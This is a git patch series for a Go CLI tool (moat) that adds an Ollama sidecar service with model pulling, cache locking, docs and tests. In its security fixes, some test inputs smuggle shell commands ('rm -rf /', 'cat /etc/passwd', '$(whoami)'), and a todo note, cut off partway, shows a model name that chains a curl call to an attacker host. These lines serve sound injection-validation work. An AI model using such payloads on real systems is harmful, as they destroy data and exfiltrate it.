Apply user overrides @@ -137,16 +166,54 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv } } + // Resolve provisions from user spec Extra using registry's provisions_key + var provisions []string + if userSpec != nil && spec.Service.ProvisionsKey != "" { + provisions = userSpec.Extra[spec.Service.ProvisionsKey] + + // Validate: reject unknown Extra keys that don't match provisions_key + for key := range userSpec.Extra { + if key != spec.Service.ProvisionsKey { + return container.ServiceConfig{}, fmt.Errorf( + "services.%s.%s is not a valid key (did you mean %q?)", + dep.Name, key, spec.Service.ProvisionsKey, + ) + } + } + } else if userSpec != nil && len(userSpec.Extra) > 0 { + // Service doesn't support provisions but user provided extra keys + for key := range userSpec.Extra { + return container.ServiceConfig{}, fmt.Errorf( + "services.%s.%s is not a valid configuration key", + dep.Name, key, + ) + } + } + + // Resolve cache host path + var cacheHostPath string + if spec.Service.CachePath != "" { + homeDir, err := os.UserHomeDir() + if err != nil { + return container.ServiceConfig{}, fmt.Errorf("resolving home directory for cache: %w", err) + } + cacheHostPath = filepath.Join(homeDir, ".moat", "cache", dep.Name) + } + return container.ServiceConfig{ - Name: dep.Name, - Version: dep.Version, - Env: env, - RunID: runID, - Image: spec.Service.Image, - Ports: spec.Service.Ports, - PasswordEnv: spec.Service.PasswordEnv, - ExtraCmd: spec.Service.ExtraCmd, - ReadinessCmd: spec.Service.ReadinessCmd, + Name: dep.Name, + Version: dep.Version, + Env: env, + RunID: runID, + Image: spec.Service.Image, + Ports: spec.Service.Ports, + PasswordEnv: spec.Service.PasswordEnv, + ExtraCmd: spec.Service.ExtraCmd, + ReadinessCmd: spec.Service.ReadinessCmd, + CachePath: spec.Service.CachePath, + CacheHostPath: cacheHostPath, + Provisions: provisions, + ProvisionCmd: spec.Service.ProvisionCmd, }, nil } diff --git a/internal/run/services_test.go b/internal/run/services_test.go index e25d9e21..0a8cbe15 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -143,3 +143,86 @@ func TestBuildServiceConfigUnknown(t *testing.T) { assert.Error(t, err) assert.Contains(t, err.Error(), "unknown service") } + +func TestBuildServiceConfigOllama(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": {"qwen2.5-coder:7b", "nomic-embed-text"}, + }, + } + + cfg, err := buildServiceConfig(dep, "run-ollama", userSpec) + require.NoError(t, err) + + assert.Equal(t, "ollama", cfg.Name) + assert.Equal(t, "0.9", cfg.Version) + assert.Equal(t, "ollama/ollama", cfg.Image) + assert.Equal(t, 11434, cfg.Ports["default"]) + assert.Equal(t, "/root/.ollama", cfg.CachePath) + assert.Equal(t, "ollama pull {item}", cfg.ProvisionCmd) + assert.Equal(t, []string{"qwen2.5-coder:7b", "nomic-embed-text"}, cfg.Provisions) + + // Ollama has no auth — no password should be set + assert.Empty(t, cfg.Env) + assert.Empty(t, cfg.PasswordEnv) +} + +func TestBuildServiceConfigOllamaNoModels(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-ollama", nil) + require.NoError(t, err) + + assert.Empty(t, cfg.Provisions) + assert.Equal(t, "ollama pull {item}", cfg.ProvisionCmd) +} + +func TestBuildServiceConfigNoPasswordForNoAuth(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-test", nil) + require.NoError(t, err) + + _, hasPassword := cfg.Env["password"] + assert.False(t, hasPassword, "should not set phantom password for no-auth services") +} + +func TestBuildServiceConfigPostgresStillHasPassword(t *testing.T) { + dep := deps.Dependency{Name: "postgres", Version: "17", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-pg", nil) + require.NoError(t, err) + + assert.NotEmpty(t, cfg.Env["POSTGRES_PASSWORD"], "postgres should still get a password") +} + +func TestBuildServiceConfigValidatesProvisionsKey(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "model": {"qwen2.5-coder:7b"}, + }, + } + + _, err := buildServiceConfig(dep, "run-ollama", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "model") +} + +func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { + dep := deps.Dependency{Name: "postgres", Version: "17", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "plugins": {"pg_trgm"}, + }, + } + + _, err := buildServiceConfig(dep, "run-pg", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "plugins") + assert.Contains(t, err.Error(), "not a valid") +} From b963ed5f1bc9eeed2f9911c9a8ec2ed63d489699 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:38:58 +0000 Subject: [PATCH 07/27] feat(run): add service provisioning with flock-based cache locking --- internal/run/manager.go | 32 ++++++++++++++++++++++++ internal/run/services.go | 46 +++++++++++++++++++++++++++++++++++ internal/run/services_test.go | 10 ++++++++ 3 files changed, 88 insertions(+) diff --git a/internal/run/manager.go b/internal/run/manager.go index 220c54a2..b0728714 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1878,6 +1878,7 @@ region = %s // Start services r.ServiceContainers = make(map[string]string) var serviceInfos []container.ServiceInfo + var svcConfigs []container.ServiceConfig cleanupServices := func() { for _, info := range serviceInfos { @@ -1904,6 +1905,21 @@ region = %s return nil, fmt.Errorf("configuring %s service: %w", dep.Name, err) } + svcConfigs = append(svcConfigs, svcCfg) + + // Create cache directory if needed + if svcCfg.CacheHostPath != "" { + if mkdirErr := os.MkdirAll(svcCfg.CacheHostPath, 0o755); mkdirErr != nil { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("creating cache directory for %s: %w", dep.Name, mkdirErr) + } + } + info, err := svcMgr.StartService(ctx, svcCfg) if err != nil { cleanupServices() @@ -1945,6 +1961,22 @@ region = %s "Or disable wait:\n services:\n %s:\n wait: false", dep.Name, err, r.ID, dep.Name, dep.Name) } + + // Provision items (e.g., pull models) if configured + if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { + log.Debug("provisioning service", "service", dep.Name, "items", svcConfigs[i].Provisions) + if err := provisionService(ctx, svcMgr, info, svcConfigs[i], os.Stderr); err != nil { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("%s service provisioning failed: %w\n\n"+ + "Service container logs:\n moat logs %s --service %s", + dep.Name, err, r.ID, dep.Name) + } + } } // Inject MOAT_* env vars diff --git a/internal/run/services.go b/internal/run/services.go index 608305d3..bbfac64e 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -4,11 +4,13 @@ import ( "context" "crypto/rand" "fmt" + "io" "math/big" "os" "path/filepath" "strconv" "strings" + "syscall" "time" "github.com/majorcontext/moat/internal/config" @@ -217,6 +219,50 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv }, nil } +const provisionTimeout = 30 * time.Minute + +// buildProvisionCmds creates concrete commands from a template and item list. +func buildProvisionCmds(cmdTemplate string, items []string) []string { + if len(items) == 0 { + return nil + } + cmds := make([]string, len(items)) + for i, item := range items { + cmds[i] = strings.ReplaceAll(cmdTemplate, "{item}", item) + } + return cmds +} + +// provisionService runs provision commands inside a started service container. +// Uses flock-based advisory locking on the cache directory to prevent concurrent +// corruption from parallel runs. +func provisionService(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo, cfg container.ServiceConfig, stdout io.Writer) error { + cmds := buildProvisionCmds(cfg.ProvisionCmd, cfg.Provisions) + if len(cmds) == 0 { + return nil + } + + ctx, cancel := context.WithTimeout(ctx, provisionTimeout) + defer cancel() + + // Advisory lock on cache directory to prevent concurrent pull corruption. + // Cache directory is already created by the manager before starting the sidecar. + if cfg.CacheHostPath != "" { + lockPath := filepath.Join(cfg.CacheHostPath, ".lock") + lockFile, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0o644) + if err != nil { + return fmt.Errorf("opening cache lock %s: %w", lockPath, err) + } + defer lockFile.Close() + if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { + return fmt.Errorf("acquiring cache lock: %w", err) + } + defer func() { _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) }() + } + + return mgr.ProvisionService(ctx, info, cmds, stdout) +} + // waitForServiceReady polls CheckReady until success or timeout. func waitForServiceReady(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo) error { ctx, cancel := context.WithTimeout(ctx, readinessTimeout) diff --git a/internal/run/services_test.go b/internal/run/services_test.go index 0a8cbe15..2b31460e 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -226,3 +226,13 @@ func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { assert.Contains(t, err.Error(), "plugins") assert.Contains(t, err.Error(), "not a valid") } + +func TestBuildProvisionCmds(t *testing.T) { + cmds := buildProvisionCmds("ollama pull {item}", []string{"qwen2.5-coder:7b", "nomic-embed-text"}) + assert.Equal(t, []string{"ollama pull qwen2.5-coder:7b", "ollama pull nomic-embed-text"}, cmds) +} + +func TestBuildProvisionCmdsEmpty(t *testing.T) { + cmds := buildProvisionCmds("ollama pull {item}", nil) + assert.Empty(t, cmds) +} From d10e5cffb8955dafe6102fefd88708662724e9ef Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:39:31 +0000 Subject: [PATCH 08/27] docs(examples): add Ollama service dependency example --- examples/service-ollama/demo.sh | 17 +++++++++++++++++ examples/service-ollama/moat.yaml | 23 +++++++++++++++++++++++ 2 files changed, 40 insertions(+) create mode 100644 examples/service-ollama/demo.sh create mode 100644 examples/service-ollama/moat.yaml diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh new file mode 100644 index 00000000..5060475f --- /dev/null +++ b/examples/service-ollama/demo.sh @@ -0,0 +1,17 @@ +#!/bin/sh +set -e + +echo "=== Ollama Service Demo ===" +echo "MOAT_OLLAMA_URL=$MOAT_OLLAMA_URL" +echo + +echo "--- Available models ---" +curl -s "$MOAT_OLLAMA_URL/api/tags" | head -c 200 +echo +echo + +echo "--- Generating response ---" +curl -s "$MOAT_OLLAMA_URL/api/generate" \ + -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ + | head -c 500 +echo diff --git a/examples/service-ollama/moat.yaml b/examples/service-ollama/moat.yaml new file mode 100644 index 00000000..dedf37d0 --- /dev/null +++ b/examples/service-ollama/moat.yaml @@ -0,0 +1,23 @@ +# Example: Ollama service dependency +# +# Demonstrates local model inference using Ollama as a service dependency. +# Moat starts an Ollama sidecar, pulls the declared model, and injects +# MOAT_OLLAMA_* environment variables into the agent container. +# +# Run with: +# moat run examples/service-ollama +# +# The demo script queries the Ollama API to list models and generate a response. + +name: service-ollama + +dependencies: + - ollama@0.9 + - curl + +services: + ollama: + models: + - qwen2.5-coder:1.5b + +command: ["sh", "/workspace/demo.sh"] From 91425e67b495741d681f77141d02bcae0d4173ef Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:39:41 +0000 Subject: [PATCH 09/27] test(run): add env generation test for Ollama no-auth service --- internal/run/services_test.go | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) diff --git a/internal/run/services_test.go b/internal/run/services_test.go index 2b31460e..c00aa988 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -236,3 +236,29 @@ func TestBuildProvisionCmdsEmpty(t *testing.T) { cmds := buildProvisionCmds("ollama pull {item}", nil) assert.Empty(t, cmds) } + +func TestGenerateServiceEnvOllama(t *testing.T) { + spec, ok := deps.GetSpec("ollama") + require.True(t, ok) + + info := container.ServiceInfo{ + Name: "ollama", + Host: "ollama", + Ports: map[string]int{"default": 11434}, + Env: map[string]string{}, + } + + env := generateServiceEnv(spec.Service, info, nil) + + assert.Equal(t, "ollama", env["MOAT_OLLAMA_HOST"]) + assert.Equal(t, "11434", env["MOAT_OLLAMA_PORT"]) + assert.Equal(t, "http://ollama:11434", env["MOAT_OLLAMA_URL"]) + + // No auth — should not have password, user, or db + _, hasPassword := env["MOAT_OLLAMA_PASSWORD"] + assert.False(t, hasPassword, "should not inject password for no-auth services") + _, hasUser := env["MOAT_OLLAMA_USER"] + assert.False(t, hasUser) + _, hasDB := env["MOAT_OLLAMA_DB"] + assert.False(t, hasDB) +} From 94bcf312ce54edbad2a107c331591d76f7f6c60e Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:40:29 +0000 Subject: [PATCH 10/27] docs: add Ollama service documentation and provisions pattern --- docs/content/guides/08-services.md | 33 ++++++++++++++++++++++- docs/content/reference/02-moat-yaml.md | 25 +++++++++++++++++ docs/content/reference/06-dependencies.md | 3 ++- 3 files changed, 59 insertions(+), 2 deletions(-) diff --git a/docs/content/guides/08-services.md b/docs/content/guides/08-services.md index dbd63d76..4cc4b4c7 100644 --- a/docs/content/guides/08-services.md +++ b/docs/content/guides/08-services.md @@ -2,7 +2,7 @@ title: "Service dependencies" navTitle: "Services" description: "Run ephemeral databases and caches alongside your agent containers." -keywords: ["moat", "postgres", "mysql", "redis", "database", "service", "sidecar"] +keywords: ["moat", "postgres", "mysql", "redis", "ollama", "database", "service", "sidecar"] --- # Service dependencies @@ -189,9 +189,40 @@ Each service has a built-in readiness command: | `postgres` | `pg_isready -h localhost -U postgres` | | `mysql` | `mysqladmin ping -h localhost -u root --password=` | | `redis` | `redis-cli -a PING` | +| `ollama` | `ollama list` + pull declared models | Readiness checks run inside the service container via `docker exec`. They verify that the service accepts connections with the generated credentials. +### Ollama (local models) + +Ollama provides local model inference without external API keys: + +```yaml +dependencies: + - ollama@0.9 + +services: + ollama: + models: + - qwen2.5-coder:7b + - nomic-embed-text +``` + +Models are pulled during startup and cached at `~/.moat/cache/ollama/` on the host. Subsequent runs skip the download. + +```python +import requests +import os + +url = os.environ["MOAT_OLLAMA_URL"] +resp = requests.post(f"{url}/api/generate", json={ + "model": "qwen2.5-coder:7b", + "prompt": "Write hello world in Go", + "stream": False, +}) +print(resp.json()["response"]) +``` + ## Network architecture ```text diff --git a/docs/content/reference/02-moat-yaml.md b/docs/content/reference/02-moat-yaml.md index 986fff07..ecf91810 100644 --- a/docs/content/reference/02-moat-yaml.md +++ b/docs/content/reference/02-moat-yaml.md @@ -266,6 +266,7 @@ dependencies: | `mysql@8` | MySQL 8 | 3306 | | `mysql@9` | MySQL 9 | 3306 | | `redis@7` | Redis 7 | 6379 | +| `ollama@0.9` | Ollama | 11434 | Each service injects `MOAT_*` environment variables into the main container. See [Service environment variables](#service-environment-variables) for the full list. @@ -872,6 +873,24 @@ Each key matches a service name from `dependencies:` (e.g., `postgres`, `mysql`, Setting `wait: false` starts the main container without waiting for the service health check to pass. +### Service-specific lists + +Some services accept additional list configuration beyond `env` and `wait`. These keys are defined by the service's registry entry: + +| Service | Key | Purpose | +|---------|-----|---------| +| `ollama` | `models` | Models to pull during startup | + +Example: + +```yaml +services: + ollama: + models: + - qwen2.5-coder:7b + - nomic-embed-text +``` + ### Service environment variables Moat injects `MOAT_*` environment variables into the main container for each service dependency. Credentials are auto-generated per run. @@ -907,6 +926,12 @@ Moat injects `MOAT_*` environment variables into the main container for each ser | `MOAT_REDIS_PORT` | Port | `6379` | | `MOAT_REDIS_PASSWORD` | Auto-generated password | | +#### Ollama + +| Variable | Description | Example | +|----------|-------------|---------| +| `MOAT_OLLAMA_URL` | Base URL for the Ollama API | `http://ollama:11434` | + --- ## Claude Code diff --git a/docs/content/reference/06-dependencies.md b/docs/content/reference/06-dependencies.md index 43055502..75828579 100644 --- a/docs/content/reference/06-dependencies.md +++ b/docs/content/reference/06-dependencies.md @@ -121,7 +121,7 @@ See [Available services](#available-services) below for the full list, and the [ | Workflow tools | `graphite-cli` | Implied by `--grant graphite` | | Database clients | `psql`, `mysql-client`, `redis-cli`, `sqlite3` | Pair with corresponding service | | Cloud tools | `aws`, `gcloud`, `kubectl`, `terraform`, `helm` | | -| Services | `postgres`, `mysql`, `redis` | Run as sidecar containers | +| Services | `postgres`, `mysql`, `redis`, `ollama` | Run as sidecar containers | Run `moat deps list --type ` to filter by category. @@ -190,6 +190,7 @@ Both modes require Docker runtime. Apple containers do not support Docker socket | `postgres` | 17 | `MOAT_POSTGRES_*` | | `mysql` | 8 | `MOAT_MYSQL_*` | | `redis` | 7 | `MOAT_REDIS_*` | +| `ollama` | 0.9 | `MOAT_OLLAMA_URL` | Service dependencies require Docker or Apple container runtime. See the [service dependencies guide](../guides/08-services.md) for environment variable details, networking, and security information. From 6878451d710a0b8df686ccaade5172d871dc1aba Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 03:00:50 +0000 Subject: [PATCH 11/27] fix: address code review findings for Ollama sidecar (P1-P3) P1 fixes: - Validate provision items against regex to prevent shell injection via model names interpolated into sh -c commands - Fix error messages referencing nonexistent --service flag on moat logs P2 fixes: - Tighten cache directory permissions from 0755 to 0700 - Tighten lock file permissions from 0644 to 0600 - Change provision timeout from per-batch to per-item (30min each) - Narrow flock scope to per-item so parallel runs don't serialize P3 fixes: - Consolidate duplicated extra_env loop in buildServiceConfig - Capture unknown scalar keys in ServiceSpec YAML for validation - Add versions list and quote image in ollama registry entry --- compound-engineering.local.md | 9 +++ internal/config/config.go | 7 ++ internal/config/config_test.go | 14 ++++ internal/deps/registry.yaml | 3 +- internal/run/manager.go | 10 +-- internal/run/services.go | 79 +++++++++++++------ internal/run/services_test.go | 51 ++++++++++++ ...ng-p1-command-injection-provision-items.md | 79 +++++++++++++++++++ ...existent-service-flag-in-error-messages.md | 54 +++++++++++++ ...-pending-p2-cache-directory-permissions.md | 27 +++++++ ...-pending-p2-provision-timeout-per-batch.md | 37 +++++++++ ...ing-p2-flock-scope-blocks-parallel-runs.md | 42 ++++++++++ ...-pending-p2-provision-output-not-stored.md | 36 +++++++++ ...07-pending-p3-duplicated-extra-env-loop.md | 24 ++++++ ...8-pending-p3-silent-unknown-scalar-keys.md | 26 ++++++ ...9-pending-p3-registry-entry-consistency.md | 23 ++++++ 16 files changed, 493 insertions(+), 28 deletions(-) create mode 100644 compound-engineering.local.md create mode 100644 todos/001-pending-p1-command-injection-provision-items.md create mode 100644 todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md create mode 100644 todos/003-pending-p2-cache-directory-permissions.md create mode 100644 todos/004-pending-p2-provision-timeout-per-batch.md create mode 100644 todos/005-pending-p2-flock-scope-blocks-parallel-runs.md create mode 100644 todos/006-pending-p2-provision-output-not-stored.md create mode 100644 todos/007-pending-p3-duplicated-extra-env-loop.md create mode 100644 todos/008-pending-p3-silent-unknown-scalar-keys.md create mode 100644 todos/009-pending-p3-registry-entry-consistency.md diff --git a/compound-engineering.local.md b/compound-engineering.local.md new file mode 100644 index 00000000..55a63512 --- /dev/null +++ b/compound-engineering.local.md @@ -0,0 +1,9 @@ +--- +review_agents: + - architecture-strategist + - security-sentinel + - performance-oracle + - pattern-recognition-specialist +--- + +Go CLI project (moat). Review for Go idioms, error handling, interface design, and test coverage. diff --git a/internal/config/config.go b/internal/config/config.go index 73e655a6..ec1af7ec 100644 --- a/internal/config/config.go +++ b/internal/config/config.go @@ -187,6 +187,13 @@ func (s *ServiceSpec) UnmarshalYAML(value *yaml.Node) error { s.Extra = make(map[string][]string) } s.Extra[key] = items + } else { + // Capture unknown non-sequence keys as single-element entries + // so the run layer can validate and reject them with useful errors. + if s.Extra == nil { + s.Extra = make(map[string][]string) + } + s.Extra[key] = nil // nil signals "key present but not a list" } } return nil diff --git a/internal/config/config_test.go b/internal/config/config_test.go index 8140b90b..f89eda88 100644 --- a/internal/config/config_test.go +++ b/internal/config/config_test.go @@ -2336,3 +2336,17 @@ models: [] require.NoError(t, err) assert.Empty(t, spec.Extra["models"]) } + +func TestServiceSpecUnmarshalCapturesScalarKeys(t *testing.T) { + input := ` +env: + FOO: bar +typo_key: some_value +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + // Unknown scalar keys are captured in Extra with nil value + assert.Contains(t, spec.Extra, "typo_key") + assert.Nil(t, spec.Extra["typo_key"]) +} diff --git a/internal/deps/registry.yaml b/internal/deps/registry.yaml index da37a23c..dd508321 100644 --- a/internal/deps/registry.yaml +++ b/internal/deps/registry.yaml @@ -493,8 +493,9 @@ ollama: description: Ollama local model server type: service default: "0.9" + versions: ["0.6", "0.7", "0.8", "0.9"] service: - image: ollama/ollama + image: "ollama/ollama" ports: default: 11434 env_prefix: OLLAMA diff --git a/internal/run/manager.go b/internal/run/manager.go index b0728714..5a9df1ae 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1909,7 +1909,7 @@ region = %s // Create cache directory if needed if svcCfg.CacheHostPath != "" { - if mkdirErr := os.MkdirAll(svcCfg.CacheHostPath, 0o755); mkdirErr != nil { + if mkdirErr := os.MkdirAll(svcCfg.CacheHostPath, 0o700); mkdirErr != nil { cleanupServices() cleanupDaemonRun() cleanupSSH(sshServer) @@ -1957,9 +1957,9 @@ region = %s cleanupAgentConfig(codexConfig) cleanupAgentConfig(geminiConfig) return nil, fmt.Errorf("%s service failed to become ready: %w\n\n"+ - "Service container logs:\n moat logs %s --service %s\n\n"+ + "Check run logs:\n moat logs %s\n\n"+ "Or disable wait:\n services:\n %s:\n wait: false", - dep.Name, err, r.ID, dep.Name, dep.Name) + dep.Name, err, r.ID, dep.Name) } // Provision items (e.g., pull models) if configured @@ -1973,8 +1973,8 @@ region = %s cleanupAgentConfig(codexConfig) cleanupAgentConfig(geminiConfig) return nil, fmt.Errorf("%s service provisioning failed: %w\n\n"+ - "Service container logs:\n moat logs %s --service %s", - dep.Name, err, r.ID, dep.Name) + "Check run logs:\n moat logs %s", + dep.Name, err, r.ID) } } } diff --git a/internal/run/services.go b/internal/run/services.go index bbfac64e..4c6a71cf 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -8,6 +8,7 @@ import ( "math/big" "os" "path/filepath" + "regexp" "strconv" "strings" "syscall" @@ -23,6 +24,12 @@ const passwordChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234 const readinessTimeout = 30 * time.Second const readinessInterval = 1 * time.Second +// validProvisionItem matches safe provision item names (e.g., Ollama model names). +// Allows alphanumerics, dots, dashes, underscores, colons, slashes, and @ signs. +// Rejects shell metacharacters (;, |, $, `, &, (, ), etc.) to prevent injection +// when items are interpolated into sh -c commands. +var validProvisionItem = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9._:/@-]*$`) + // generatePassword creates a cryptographically random alphanumeric password. func generatePassword() (string, error) { b := make([]byte, passwordLength) @@ -136,8 +143,10 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv needsPassword := spec.Service.PasswordEnv != "" || serviceUsesPasswordPlaceholder(spec.Service) // Only generate password for services that have auth + var password string if needsPassword { - password, err := generatePassword() + var err error + password, err = generatePassword() if err != nil { return container.ServiceConfig{}, err } @@ -146,19 +155,14 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv } else { env["password"] = password } + } - // Set extra_env from registry with placeholder substitution - for k, v := range spec.Service.ExtraEnv { - v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) - v = strings.ReplaceAll(v, "{password}", password) - env[k] = v - } - } else { - // No auth — still apply extra_env without password substitution - for k, v := range spec.Service.ExtraEnv { - v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) - env[k] = v - } + // Set extra_env from registry with placeholder substitution. + // When password is empty, ReplaceAll is a no-op for {password}. + for k, v := range spec.Service.ExtraEnv { + v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) + v = strings.ReplaceAll(v, "{password}", password) + env[k] = v } // Apply user overrides @@ -182,6 +186,17 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv ) } } + + // Validate provision items to prevent shell injection. + // Items are interpolated into sh -c commands; reject shell metacharacters. + for _, item := range provisions { + if !validProvisionItem.MatchString(item) { + return container.ServiceConfig{}, fmt.Errorf( + "invalid %s item %q: contains disallowed characters (must match %s)", + spec.Service.ProvisionsKey, item, validProvisionItem.String(), + ) + } + } } else if userSpec != nil && len(userSpec.Extra) > 0 { // Service doesn't support provisions but user provided extra keys for key := range userSpec.Extra { @@ -235,32 +250,52 @@ func buildProvisionCmds(cmdTemplate string, items []string) []string { // provisionService runs provision commands inside a started service container. // Uses flock-based advisory locking on the cache directory to prevent concurrent -// corruption from parallel runs. +// corruption from parallel runs. Each provision item gets its own timeout +// (provisionTimeout) rather than a single timeout for the entire batch. func provisionService(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo, cfg container.ServiceConfig, stdout io.Writer) error { cmds := buildProvisionCmds(cfg.ProvisionCmd, cfg.Provisions) if len(cmds) == 0 { return nil } - ctx, cancel := context.WithTimeout(ctx, provisionTimeout) - defer cancel() - // Advisory lock on cache directory to prevent concurrent pull corruption. // Cache directory is already created by the manager before starting the sidecar. + var lockFile *os.File if cfg.CacheHostPath != "" { lockPath := filepath.Join(cfg.CacheHostPath, ".lock") - lockFile, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0o644) + var err error + lockFile, err = os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0o600) if err != nil { return fmt.Errorf("opening cache lock %s: %w", lockPath, err) } defer lockFile.Close() - if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { - return fmt.Errorf("acquiring cache lock: %w", err) + } + + for _, cmd := range cmds { + // Per-item timeout: each provision command gets its own deadline. + cmdCtx, cancel := context.WithTimeout(ctx, provisionTimeout) + + // Acquire lock per-item so parallel runs pulling different items don't serialize. + if lockFile != nil { + if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { + cancel() + return fmt.Errorf("acquiring cache lock: %w", err) + } + } + + err := mgr.ProvisionService(cmdCtx, info, []string{cmd}, stdout) + + if lockFile != nil { + _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) + } + cancel() + + if err != nil { + return err } - defer func() { _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) }() } - return mgr.ProvisionService(ctx, info, cmds, stdout) + return nil } // waitForServiceReady polls CheckReady until success or timeout. diff --git a/internal/run/services_test.go b/internal/run/services_test.go index c00aa988..af5c3bec 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -227,6 +227,57 @@ func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { assert.Contains(t, err.Error(), "not a valid") } +func TestBuildServiceConfigRejectsShellInjection(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + tests := []struct { + name string + model string + }{ + {"semicolon", "foo; rm -rf /"}, + {"pipe", "foo | cat /etc/passwd"}, + {"dollar", "foo$(whoami)"}, + {"backtick", "foo`whoami`"}, + {"ampersand", "foo && echo pwned"}, + {"empty", ""}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": {tt.model}, + }, + } + _, err := buildServiceConfig(dep, "run-test", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "disallowed characters") + }) + } +} + +func TestBuildServiceConfigAcceptsValidModelNames(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + validModels := []string{ + "qwen2.5-coder:7b", + "nomic-embed-text", + "llama3.1:70b", + "library/model:latest", + "user/repo:v1.2.3", + } + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": validModels, + }, + } + + cfg, err := buildServiceConfig(dep, "run-test", userSpec) + require.NoError(t, err) + assert.Equal(t, validModels, cfg.Provisions) +} + func TestBuildProvisionCmds(t *testing.T) { cmds := buildProvisionCmds("ollama pull {item}", []string{"qwen2.5-coder:7b", "nomic-embed-text"}) assert.Equal(t, []string{"ollama pull qwen2.5-coder:7b", "ollama pull nomic-embed-text"}, cmds) diff --git a/todos/001-pending-p1-command-injection-provision-items.md b/todos/001-pending-p1-command-injection-provision-items.md new file mode 100644 index 00000000..2053842e --- /dev/null +++ b/todos/001-pending-p1-command-injection-provision-items.md @@ -0,0 +1,79 @@ +--- +status: pending +priority: p1 +issue_id: "001" +tags: [code-review, security] +dependencies: [] +--- + +# Command Injection via Provision Item Names + +## Problem Statement + +User-supplied model names from `moat.yaml` are interpolated directly into a shell command template via `strings.ReplaceAll(cmdTemplate, "{item}", item)` and executed via `sh -c` inside the service container. There is zero validation or sanitization of the model name strings. + +A `moat.yaml` like: +```yaml +services: + ollama: + models: + - "qwen2.5-coder:7b; curl http://attacker.com/exfil" +``` +produces `ollama pull qwen2.5-coder:7b; curl http://attacker.com/exfil` passed to `sh -c`. + +While `moat.yaml` is user-authored (so the threat model is "user trusts their own config"), a malicious repository with a checked-in `moat.yaml` could exploit developers who clone and `moat run`. Combined with the host-writable cache mount, this allows writing arbitrary files to `~/.moat/cache/ollama/` on the host. + +## Findings + +- **Source**: Security Sentinel, Architecture Strategist +- **Location**: `internal/run/services.go:225-233` 